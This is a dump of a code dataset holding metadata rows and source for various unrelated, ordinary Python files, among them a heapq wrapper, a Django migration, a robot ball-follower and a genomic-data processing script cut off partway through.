Dataset schema (one row per source file; records below follow the same column order):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 – 616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0 – 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 – 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1 – 132 |
83a7cf76438adbf0701b18c3ad90a86a5c6c7c4f | 880a56c0eebcce3376d1969bb8b084d82b90f535 | /xos/tosca/resources/vcpeservice.py | 2a6a56db92968457ed9e7b053b4e159a17d86f92 | ["Apache-2.0"] | permissive | digideskio/xos | 9f590a3a2703198c4d5b9b2fa27a3b9a94c14b96 | 9c98f28793ce4b2e4be96665e7f06b9cf9b59315 | refs/heads/master | 2020-12-03T08:13:08.982841 | 2016-04-06T00:39:06 | 2016-04-06T00:39:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py |

import os
import pdb
import sys
import tempfile
sys.path.append("/opt/tosca")
from translator.toscalib.tosca_template import ToscaTemplate
from services.cord.models import VSGService
from service import XOSService
class XOSVsgService(XOSService):
provides = "tosca.nodes.VSGService"
xos_model = VSGService
copyin_props = ["view_url", "icon_url", "enabled", "published", "public_key",
"private_key_fn", "versionNumber", "backend_network_label",
"wan_container_gateway_ip", "wan_container_gateway_mac",
"wan_container_netbits", "dns_servers", "node_label"]
| [
"[email protected]"
] | |
d2d18338371df02f19a8aa511ed62c3486298a71 | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/437116_Wrapper_class_heapq/recipe-437116.py | 0d8f07bdf229fd1e0efdc4a367c438cd088d4c8f | ["MIT", "Python-2.0"] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,197 | py |

import heapq
class Heap(list):
"""This is a wrapper class for the heap functions provided
by the heapq module.
"""
__slots__ = ()
def __init__(self, t=[]):
self.extend(t)
self.heapify()
push = heapq.heappush
popmin = heapq.heappop
replace = heapq.heapreplace
heapify = heapq.heapify
def pushpop(self, item):
"Push the item onto the heap and then pop the smallest value"
if self and self[0] < item:
return heapq.heapreplace(self, item)
return item
def __iter__(self):
"Return a destructive iterator over the heap's elements"
try:
while True:
yield self.popmin()
except IndexError:
pass
def reduce(self, pos, newitem):
"Replace self[pos] with a lower value item and then reheapify"
while pos > 0:
parentpos = (pos - 1) >> 1
parent = self[parentpos]
if parent <= newitem:
break
self[pos] = parent
pos = parentpos
self[pos] = newitem
def is_heap(self):
"Return True if the heap has the heap property; False otherwise"
n = len(self)
# The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
try:
for i in xrange(n//2):
if self[i] > self[2*i+1]: return False
if self[i] > self[2*i+2]: return False
except IndexError:
pass
return True
def heapsort(seq):
return [x for x in Heap(seq)]
if __name__ == '__main__':
from random import randint, shuffle
# generate a random test case
n = 15
data = [randint(1,n) for i in xrange(n)]
shuffle(data)
print data
# test the constructor
heap = Heap(data)
print heap, heap.is_heap()
# test popmin
sorted = []
while heap:
sorted.append(heap.popmin())
data.sort()
print heap, heap.is_heap()
print data == sorted
# test 2
shuffle(data)
print data
# test push
for item in data:
heap.push(item)
print heap, heap.is_heap()
# test __iter__
sorted = [x for x in heap]
data.sort()
print data == sorted
# test 3
shuffle(data)
print data
heap = Heap(data)
print heap, heap.is_heap()
# test reduce
for i in range(5):
pos = randint(0,n-1)
decr = randint(1,10)
item = heap[pos] - decr
heap.reduce(pos, item)
# test is_heap
heap = Heap(data)
count = 0
while 1:
shuffle(heap)
if heap.is_heap():
print heap
break
else:
count += 1
print 'It took', count, 'tries to find a heap by chance.'
print heapsort(data)
try:
heap.x = 5
except AttributeError:
print "Can't add attributes."
| [
"[email protected]"
] | |
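The `Heap` wrapper above works by rebinding `heapq`'s module-level functions as methods of a `list` subclass. For comparison, a minimal sketch of the same operations written directly against the stdlib API (Python 3; the data values are illustrative):

```python
import heapq

data = [9, 4, 7, 1, 3]
heapq.heapify(data)                    # in-place: the list now satisfies the heap invariant
heapq.heappush(data, 2)                # insert while keeping the invariant
smallest = heapq.heappop(data)         # remove and return the minimum (1)
replaced = heapq.heapreplace(data, 8)  # pop the new minimum, then push 8 in one sift

# Draining the heap yields ascending order -- the same destructive
# iteration that Heap.__iter__ and heapsort() implement above.
print([heapq.heappop(data) for _ in range(len(data))])
```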
07429b6879f054b600fb5a4eef6ac5a978e6a3c6 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Tools/RunTimeTester/share/RTTRegression.py | 19c13f565f054b600fb5a4eef6ac5a978e6a3c6 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,958 | py |

######################################################
#                                                    #
#  Do NOT bind any objects (self.xxx) which contain  #
#  file objects (such as self.logger in this class), #
#  otherwise we cannot shelve the objects.           #
#  Instead, unload the necessary variables in        #
#  __init__.                                         #
#                                                    #
######################################################
import os.path, anydbm
class RTTRegression:
"""An RTT test to run its own TestSuite under RTT control
    This test checks that classes can be instantiated. It also
    creates the database needed to run RTTRegression"""
def __init__(self, argDict):
self.success = 0
self.error = -1
# self.logger = argDict['logger']
        self.logger = Logger()  # NOTE: Logger is not imported in this file; it is assumed to come from the RTT framework
msg = 'Instantiating RTTRegression, args: %s' %str(argDict)
self.logger.debug(msg)
# fixtureDir is set in JobsXMLReader when reading in the config file.
self.fixtureDir = argDict['fixtureDir']
# the current directory
jDescriptor = argDict['JobDescriptor']
self.runPath = jDescriptor.runPath
self.logDir = jDescriptor.runPath
# directory of the source code under test
self.rttSrcDir = os.path.join(self.runPath, 'Tools/RunTimeTester/src')
fixture = os.path.basename(self.fixtureDir)
self.dbName = os.path.join(self.runPath, fixture+'.db')
self.refdbName = os.path.join(self.runPath, 'refFile_'+fixture+'.db')
# do not open the dir does not exist yet
self.ofName = os.path.join(self.runPath, fixture+'_regression.log')
def run(self):
outFile = open(self.ofName, 'w')
if not os.path.exists(self.dbName):
msg = 'None existant path: %s' % self.dbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
if not os.path.exists(self.refdbName):
msg = 'None existant path: %s' % self.refdbName
self.logger.error(msg)
outFile.write(msg+'\n')
outFile.close()
return self.error
newDB = anydbm.open(self.dbName, 'r')
oldDB = anydbm.open(self.refdbName, 'r')
result = self.success
onlyInNew = [k for k in newDB.keys() if k not in oldDB.keys()]
text = 'Number of keys in reference db %d\n' % len(oldDB.keys())
        text += 'Number of keys in new db        %d\n' % len(newDB.keys())
if onlyInNew:
result = self.error
text += '\n'
text +='Reference - %s: date: %s\n' % (oldDB['fixtureDir'],
oldDB['date'])
text += 'New - %s: date: %s\n' % (newDB['fixtureDir'],
newDB['date'])
text += '\n'
text += ' keys in new database, but not in old\n'
text += str(onlyInNew)+'\n'
text += '\n'
onlyInOld = [k for k in oldDB.keys() if k not in newDB.keys()]
if onlyInOld:
result = self.error
text += '\n'
text += ' keys in old database, but not in new\n'
text += str(onlyInOld)+'\n'
text += '\n'
keys = [k for k in oldDB.keys() if k in newDB.keys()]
toRemove = ['fixtureDir', 'date']
[keys.remove(k) for k in toRemove if k in keys]
if keys:
text += 'differences:\n'
text += '\n'
for k in keys:
if oldDB[k] != newDB[k]:
result = self.error
text += 'Key: %s\n' % k
text += '\n'
text += ' old:\n'
text += ' ' +str(oldDB[k])+'\n'
text += '\n'
text += ' new:\n'
text += ' '+str(newDB[k])+'\n'
text += '\n'
totTests = 0
text += 'Number of points examined:\n'
for k in keys:
line = ''
line += k.ljust(30)
ntestOld = len(oldDB[k].split(','))
ntestNew = len(newDB[k].split(','))
# assert(ntestOld == ntestNew)
num = '%d' % ntestOld
line += num.ljust(5)
# print line
totTests += ntestOld
text += 'No of test classes which pass: %d\n' % len(keys)
text += 'Total number of tests passed: %d\n ' %totTests
outFile.write(text)
outFile.close()
return result
| [
"[email protected]"
] | |
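The core of `run()` above is a keyed diff of two `anydbm` databases. A condensed Python 3 sketch of the same comparison, using the stdlib `dbm` module (file paths are placeholders):

```python
import dbm

def diff_dbs(ref_path, new_path, ignore=("fixtureDir", "date")):
    """Return (only_in_new, only_in_old, changed) key sets for two dbm files."""
    with dbm.open(ref_path, "r") as old, dbm.open(new_path, "r") as new:
        old_keys, new_keys = set(old.keys()), set(new.keys())
        skip = {k.encode() for k in ignore}      # dbm keys are bytes in Python 3
        shared = (old_keys & new_keys) - skip
        changed = {k for k in shared if old[k] != new[k]}
        return new_keys - old_keys, old_keys - new_keys, changed
```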
170b5974377c2010e0e6ae80d052cc8a08dec18a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/4dab219f99ff457d92c76f4fa70ad98f.py | 52042ea3de170bc5f8eedc4c2b7c186736a74912 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 308 | py |

#
# Skeleton file for the Python "Bob" exercise.
#
def hey(what):
if what.upper() == what and what.lower() != what:
return 'Whoa, chill out!'
elif what.endswith('?'):
return 'Sure.'
elif what.strip() == '':
return 'Fine. Be that way!'
else:
return 'Whatever.'
| [
"[email protected]"
] | |
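A few sample calls consistent with the branch order above; because the shouting test runs first, a shouted question still counts as shouting. (The import assumes the file is saved as `bob.py`.)

```python
from bob import hey  # assumed module name for the file above

assert hey("WATCH OUT!") == 'Whoa, chill out!'    # upper-case with letters
assert hey("Is it okay?") == 'Sure.'              # ends with '?'
assert hey("IS IT OKAY?") == 'Whoa, chill out!'   # shouting wins over question
assert hey("   ") == 'Fine. Be that way!'         # whitespace only
assert hey("Tom-ay-to, tom-aaaah-to.") == 'Whatever.'
```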
45db6168ca6a0ad2f3120d8dba3898a85cf52fd8 | 8f1dbd7c032a57c74a36f07690b2ecc80fb3e665 | /scratch/follow-ball.piborg.py | 09741060a051a0ba26472b3e1a30bbafa4e93cae | ["MIT"] | permissive | westpark/piwars-2018 | 6b861ff46366a76cbf8bfbec11d255e31d471b3a | a2e1cb67e5fcc8f65ed17975d076088a9f92da2a | refs/heads/master | 2021-04-28T10:57:42.294132 | 2018-04-19T10:35:24 | 2018-04-19T10:35:24 | 122,079,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,143 | py |

#!/usr/bin/env python
# coding: utf-8
# Load library functions we want
import time
import os
import sys
import ThunderBorg
import io
import threading
import picamera
import picamera.array
import cv2
import numpy
print 'Libraries loaded'
# Global values
global running
global TB
global camera
global processor
running = True
# Setup the ThunderBorg
TB = ThunderBorg.ThunderBorg()
#TB.i2cAddress = 0x15 # Uncomment and change the value if you have changed the board address
TB.Init()
if not TB.foundChip:
boards = ThunderBorg.ScanForThunderBorg()
if len(boards) == 0:
print 'No ThunderBorg found, check you are attached :)'
else:
print 'No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress)
for board in boards:
print ' %02X (%d)' % (board, board)
print 'If you need to change the I²C address change the setup line so it is correct, e.g.'
print 'TB.i2cAddress = 0x%02X' % (boards[0])
sys.exit()
TB.SetCommsFailsafe(False)
# Power settings
voltageIn = 12.0 # Total battery voltage to the ThunderBorg
voltageOut = 12.0 * 0.95 # Maximum motor voltage, we limit it to 95% to allow the RPi to get uninterrupted power
# Camera settings
imageWidth = 320 # Camera image width
imageHeight = 240 # Camera image height
frameRate = 3 # Camera image capture frame rate
# Auto drive settings
autoMaxPower = 1.0 # Maximum output in automatic mode
autoMinPower = 0.2 # Minimum output in automatic mode
autoMinArea = 10 # Smallest target to move towards
autoMaxArea = 10000 # Largest target to move towards
autoFullSpeedArea = 300 # Target size at which we use the maximum allowed output
# Setup the power limits
if voltageOut > voltageIn:
maxPower = 1.0
else:
maxPower = voltageOut / float(voltageIn)
autoMaxPower *= maxPower
# Image stream processing thread
class StreamProcessor(threading.Thread):
def __init__(self):
super(StreamProcessor, self).__init__()
self.stream = picamera.array.PiRGBArray(camera)
self.event = threading.Event()
self.terminated = False
self.start()
self.begin = 0
def run(self):
# This method runs in a separate thread
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
# Read the image and do some processing on it
self.stream.seek(0)
self.ProcessImage(self.stream.array)
finally:
# Reset the stream and event
self.stream.seek(0)
self.stream.truncate()
self.event.clear()
# Image processing function
def ProcessImage(self, image):
# Get the red section of the image
image = cv2.medianBlur(image, 5)
image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) # Swaps the red and blue channels!
red = cv2.inRange(image, numpy.array((115, 127, 64)), numpy.array((125, 255, 255)))
# Find the contours
contours,hierarchy = cv2.findContours(red, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
# Go through each contour
foundArea = -1
foundX = -1
foundY = -1
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
cx = x + (w / 2)
cy = y + (h / 2)
area = w * h
if foundArea < area:
foundArea = area
foundX = cx
foundY = cy
if foundArea > 0:
ball = [foundX, foundY, foundArea]
else:
ball = None
# Set drives or report ball status
self.SetSpeedFromBall(ball)
# Set the motor speed from the ball position
def SetSpeedFromBall(self, ball):
global TB
driveLeft = 0.0
driveRight = 0.0
if ball:
x = ball[0]
area = ball[2]
if area < autoMinArea:
print 'Too small / far'
elif area > autoMaxArea:
print 'Close enough'
else:
if area < autoFullSpeedArea:
speed = 1.0
else:
speed = 1.0 / (area / autoFullSpeedArea)
speed *= autoMaxPower - autoMinPower
speed += autoMinPower
direction = (x - imageCentreX) / imageCentreX
if direction < 0.0:
# Turn right
driveLeft = speed
driveRight = speed * (1.0 + direction)
else:
# Turn left
driveLeft = speed * (1.0 - direction)
driveRight = speed
print '%.2f, %.2f' % (driveLeft, driveRight)
else:
print 'No ball'
TB.SetMotor1(driveLeft)
TB.SetMotor2(driveRight)
# Image capture thread
class ImageCapture(threading.Thread):
def __init__(self):
super(ImageCapture, self).__init__()
self.start()
def run(self):
global camera
global processor
print 'Start the stream using the video port'
camera.capture_sequence(self.TriggerStream(), format='bgr', use_video_port=True)
print 'Terminating camera processing...'
processor.terminated = True
processor.join()
print 'Processing terminated.'
# Stream delegation loop
def TriggerStream(self):
global running
while running:
if processor.event.is_set():
time.sleep(0.01)
else:
yield processor.stream
processor.event.set()
# Startup sequence
print 'Setup camera'
camera = picamera.PiCamera()
camera.resolution = (imageWidth, imageHeight)
camera.framerate = frameRate
imageCentreX = imageWidth / 2.0
imageCentreY = imageHeight / 2.0
print 'Setup the stream processing thread'
processor = StreamProcessor()
print 'Wait ...'
time.sleep(2)
captureThread = ImageCapture()
try:
print 'Press CTRL+C to quit'
TB.MotorsOff()
TB.SetLedShowBattery(True)
# Loop indefinitely until we are no longer running
while running:
# Wait for the interval period
# You could have the code do other work in here :)
time.sleep(1.0)
# Disable all drives
TB.MotorsOff()
except KeyboardInterrupt:
# CTRL+C exit, disable all drives
print '\nUser shutdown'
TB.MotorsOff()
except:
# Unexpected error, shut down!
e = sys.exc_info()[0]
print
print e
print '\nUnexpected error, shutting down!'
TB.MotorsOff()
# Tell each thread to stop, and wait for them to end
running = False
captureThread.join()
processor.terminated = True
processor.join()
del camera
TB.MotorsOff()
TB.SetLedShowBattery(False)
TB.SetLeds(0,0,0)
print 'Program terminated.'

 | [
"[email protected]"
] | |
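`ProcessImage` above is the standard threshold-then-contour pattern. A stripped-down sketch of that core step in isolation; note that `cv2.findContours` returns two values under OpenCV 4, while the script above targets the older three-value API:

```python
import cv2
import numpy

def largest_blob(bgr_frame, lo=(115, 127, 64), hi=(125, 255, 255)):
    """Return (cx, cy, area) for the largest blob inside an HSV range, or None."""
    hsv = cv2.cvtColor(cv2.medianBlur(bgr_frame, 5), cv2.COLOR_BGR2HSV)
    mask = cv2.inRange(hsv, numpy.array(lo), numpy.array(hi))
    contours, _ = cv2.findContours(mask, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    best = None
    for contour in contours:
        x, y, w, h = cv2.boundingRect(contour)
        if best is None or w * h > best[2]:
            best = (x + w // 2, y + h // 2, w * h)  # centre and area of the box
    return best
```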
c6c9f8053ce7426d8e40844b29b1a9736d500e03 | 777a972966fa29a1b5a1a0c5d507a3137de007fc | /stock_pick_batch/__manifest__.py | cfbf3abdc520bc1242de59ad4d6ad1cd7d0cc3c3 | [] | no_license | suningwz/ruvati | 1d1ace30fb2929f686f368fb8d8c51ae76a71190 | 9b15373125139cab1d26294c218685c5b87b9709 | refs/heads/master | 2023-08-15T22:28:18.499733 | 2021-10-12T12:16:56 | 2021-10-12T12:16:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py |

# -*- coding: utf-8 -*-
{
"name": "Stock Picking Batch",
"version": "1.1",
"category": 'Inventory',
'complexity': "normal",
'author': 'Confianz Global,Inc.',
'description': """
Batch transfer in inventory
""",
'website': 'http://www.confianzit.com',
"depends": ['base', 'delivery_extension', 'stock_picking_batch','stock','delivery'],
'data': [
'views/stock_view.xml',
'report/batch_picking_report.xml',
'report/batch_picking_report_views.xml',
'static/src/xml/batch_transfer_ruvati.xml'
],
'demo_xml': [],
'installable': True,
'application': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
f58261daab0df0e28c03fbe345a6d2e337fdc477 | 45b159e64114d8759c0e2987bd0a6f02f60daf4d | /Python/APL/ch14/distanceThreeArrays.py | 80483127107e3734d02efe67dd219518fdf722b | [] | no_license | afcarl/Coding_Interview_Problems | 45b24b849a90581db5327811c5ab78237f4d5ac0 | 1256d4394d506aec875e9e19300404a9b32a4eb1 | refs/heads/master | 2020-03-16T20:16:54.706152 | 2015-02-11T05:51:56 | 2015-02-11T05:51:56 | 132,953,286 | 1 | 0 | null | 2018-05-10T20:54:14 | 2018-05-10T20:54:14 | null | UTF-8 | Python | false | false | 274 | py |

'''
Created on Jan 24, 2015
@author: Ben Athiwaratkun (pa338)
'''
#from __future__ import division
#import numpy as np
def findMin(A, B, C):
    # Left as a stub in the original. The sketch below assumes the usual
    # reading of the problem: pick one element from each array so that the
    # maximum pairwise distance (max - min of the triple) is minimised,
    # using a three-pointer sweep over the sorted arrays.
    A, B, C = sorted(A), sorted(B), sorted(C)
    i = j = k = 0
    best = None
    while i < len(A) and j < len(B) and k < len(C):
        lo = min(A[i], B[j], C[k])
        hi = max(A[i], B[j], C[k])
        if best is None or hi - lo < best[0]:
            best = (hi - lo, (A[i], B[j], C[k]))
        # Advance the pointer sitting at the smallest value to shrink the spread.
        if A[i] == lo:
            i += 1
        elif B[j] == lo:
            j += 1
        else:
            k += 1
    return best
def main():
    A = [1, 2, 3]
    B = [4, 1, 8]
    C = [3, 2, 7]
    print(findMin(A, B, C))
if __name__ == "__main__":
    main()

 | [
"[email protected]"
] | |
11689979f2e6aaa273058e3b89ba57a7a4d578c0 | 1fa265a01400c23f9ca494a1d9ef55b6cef85cdc | /inventory/migrations/0102_auto_20200131_1454.py | ac78634e1a87bf93732ef9dbfe0fc9cd5bd63da0 | [] | no_license | dipesh779/posbackend | 523660b40be4d5deaff6b6c267c65fa9caba00de | 06effb004448dbb6d99077790ceb4738875e6505 | refs/heads/master | 2022-04-25T09:15:12.081266 | 2020-05-04T04:45:56 | 2020-05-04T04:45:56 | 261,082,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py |

# Generated by Django 2.2.7 on 2020-01-31 09:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0101_auto_20200131_0911'),
]
operations = [
migrations.AlterField(
model_name='stockcomputation',
name='complimentory_sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='discrepancy_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='expired_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='final_closing_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='inspected_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='received_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='theoritical_QOH',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='threshold_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='weigh_price',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
]
| [
"[email protected]"
] | |
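Migration files like the one above are emitted by Django's autodetector when field definitions change; each `AlterField` entry mirrors one model attribute. A reduced, assumed sketch of the model side (the real `StockComputation` model clearly has more fields than shown here):

```python
from django.db import models

class StockComputation(models.Model):
    # After migration 0102, each of these quantity/price columns is a
    # nullable DecimalField with two decimal places, defaulting to 0.0.
    sale = models.DecimalField(blank=True, null=True, default=0.0,
                               max_digits=10, decimal_places=2)
    weigh_price = models.DecimalField(blank=True, null=True, default=0.0,
                                      max_digits=10, decimal_places=2)
```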
836dc051ae842d3fb098afe67dd219518fdf722b | 2aa47f47fb81798afdf41437844cbbea8e9de66c | /02pythonBase/day12/day11_exercise/factorial_sum.py | d9c669a1112be4d4c20c74aede6742f36eab15e2 | [] | no_license | nykh2010/python_note | 83f2eb8979f2fb25b4845faa313dbd6b90b36f40 | 5e7877c9f7bf29969072f05b98277ef3ba090969 | refs/heads/master | 2020-04-27T23:10:16.578094 | 2019-03-23T02:43:14 | 2019-03-23T02:43:14 | 174,765,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py |

# 3. Write a program that computes the sum of the factorials of 1 through 20
# 1! + 2! + 3! + 4! + ..... + 20!
# Method 1 (recursive, left commented out)
# def myfac(n):
# if n == 1:
# return 1
# return n * myfac(n - 1)
# s = 0
# for x in range(1, 21):
# s += myfac(x)
# print(s)
import math
print(sum(map(math.factorial, range(1, 21))))
| [
"[email protected]"
] | |
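As a quick sanity check on the one-liner, the loop below computes the same sum incrementally, reusing each factorial instead of recomputing it from scratch:

```python
total, fact = 0, 1
for n in range(1, 21):
    fact *= n      # fact == n!
    total += fact
print(total)       # 2561327494111820313, matching sum(map(math.factorial, range(1, 21)))
```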
ef7cfcbb15eaf35f6cd7f8058281eb80959721bb | 40fc1d38f2d4b643bc99df347c4ff3a763ba65e3 | /arcade/infiniworld/src/infiniworld/__init__.py | 77165064cf85e9c3120122c8375ea0e7d8ea440 | [] | no_license | alecordev/pygaming | 0be4b7a1c9e7922c63ce4cc369cd893bfef7b03c | 35e479b703acf038f47c2151b3759ad852781e4c | refs/heads/master | 2023-05-14T05:03:28.484678 | 2021-06-03T10:11:08 | 2021-06-03T10:11:08 | 372,768,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py |

"""The infiniworld package contains the entire game engine: Models Views and
Controllers, but also physics, geometry, time management, etc.
"""
from . import controllers
from . import events
from . import evtman
from . import geometry
from . import log
from . import models
from . import physics
from . import time_
| [
"[email protected]"
] | |
b81680590f118a2d347e1fb05c0986f14e401d1d | 5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8 | /buildout-cache/eggs/plone.formwidget.contenttree-1.0.14-py2.7.egg/plone/formwidget/contenttree/demo.py | 57b8a81802b37b1a271061de3b3b447da24627fd | [] | no_license | renansfs/Plone_SP | 27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a | 8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5 | refs/heads/master | 2021-01-15T15:32:43.138965 | 2016-08-24T15:30:19 | 2016-08-24T15:30:19 | 65,313,812 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py |

from zope.component import adapts
from zope.interface import Interface, implements
from zope import schema
from plone.z3cform import layout
from z3c.form import form, button, field
from plone.formwidget.contenttree import ContentTreeFieldWidget
from plone.formwidget.contenttree import MultiContentTreeFieldWidget
from plone.formwidget.contenttree import PathSourceBinder
class ITestForm(Interface):
buddy = schema.Choice(title=u"Buddy object",
description=u"Select one, please",
source=PathSourceBinder(portal_type='Document'))
friends = schema.List(
title=u"Friend objects",
description=u"Select as many as you want",
value_type=schema.Choice(
title=u"Selection",
source=PathSourceBinder(portal_type='Document')))
class TestAdapter(object):
implements(ITestForm)
adapts(Interface)
def __init__(self, context):
self.context = context
def _get_buddy(self):
return None
def _set_buddy(self, value):
print "setting", value
buddy = property(_get_buddy, _set_buddy)
def _get_friends(self):
return []
def _set_friends(self, value):
print "setting", value
friends = property(_get_friends, _set_friends)
class TestForm(form.Form):
fields = field.Fields(ITestForm)
fields['buddy'].widgetFactory = ContentTreeFieldWidget
fields['friends'].widgetFactory = MultiContentTreeFieldWidget
# To check display mode still works, uncomment this and hit refresh.
#mode = 'display'
@button.buttonAndHandler(u'Ok')
def handle_ok(self, action):
data, errors = self.extractData()
print data, errors
TestView = layout.wrap_form(TestForm)
| [
"[email protected]"
] | |
2d3850df0c094eeb7f706d70aa509e5e2011f721 | 772b0df2635b95644ea3eb370103174804024167 | /scripts/process_file.py | cfce2bb5b07aee825c3a76f0632392eb3a6e3579 | ["MIT"] | permissive | 4dn-dcic/clodius | ec909bda90a9df13fa1b85472951f6cf149213a5 | aa31b3d90a5a9fec883c20cab31ad4d347cd52cd | refs/heads/develop | 2020-04-17T23:31:32.114043 | 2019-04-02T14:01:46 | 2019-04-02T14:01:46 | 167,038,915 | 0 | 0 | MIT | 2019-03-28T20:10:46 | 2019-01-22T17:43:32 | Python | UTF-8 | Python | false | false | 2,597 | py |

from __future__ import print_function
import argparse
import os.path as op
import subprocess as sp
import sys
import tempfile as tf
def main():
usage = """
python make_tiles.py input_file
Create tiles for all of the entries in the JSON file.
"""
parser = argparse.ArgumentParser()
parser.add_argument('filepath')
parser.add_argument('-a', '--assembly', default='hg19')
parser.add_argument('-t', '--type', default='bedgraph')
parser.add_argument('--stdout', default=False, action='store_true',
help="Dump output to stdout (not implemented yet)")
args = parser.parse_args()
filedir = op.dirname(args.filepath)
outfile = open(args.filepath + '.genome.sorted.gz', 'w')
tempfile = tf.TemporaryFile('w+b')
if args.type == 'bigwig':
tempfile1 = tf.TemporaryFile()
p05 = sp.Popen(['bigWigToBedGraph', args.filepath, '/dev/fd/1'],
stdout = tempfile1)
p05.wait()
tempfile1.seek(0)
p0 = sp.Popen(['pv', '-f', '-'],
stdin=tempfile1,
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
elif args.type == 'bedgraph':
p0 = sp.Popen(['pv', '-f', args.filepath],
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
p1 = sp.Popen(["awk", "{print $1, $2, $1, $3, $4 }"],
stdin = pn.stdout,
stdout=sp.PIPE)
p2 = sp.Popen(['chr_pos_to_genome_pos.py', '-e 5', '-a', '{}'.format(args.assembly)],
stdin = p1.stdout,
stdout=sp.PIPE)
p3 = sp.Popen(['sort', '-k1,1n', '-k2,2n', '-'],
stdin = p2.stdout,
stdout=tempfile)
for line in iter(p0.stderr.readline, ""):
print("line:", line.strip())
p0.wait()
p1.wait()
p2.wait()
p3.wait()
tempfile.flush()
print("tell:", tempfile.tell())
tempfile.seek(0)
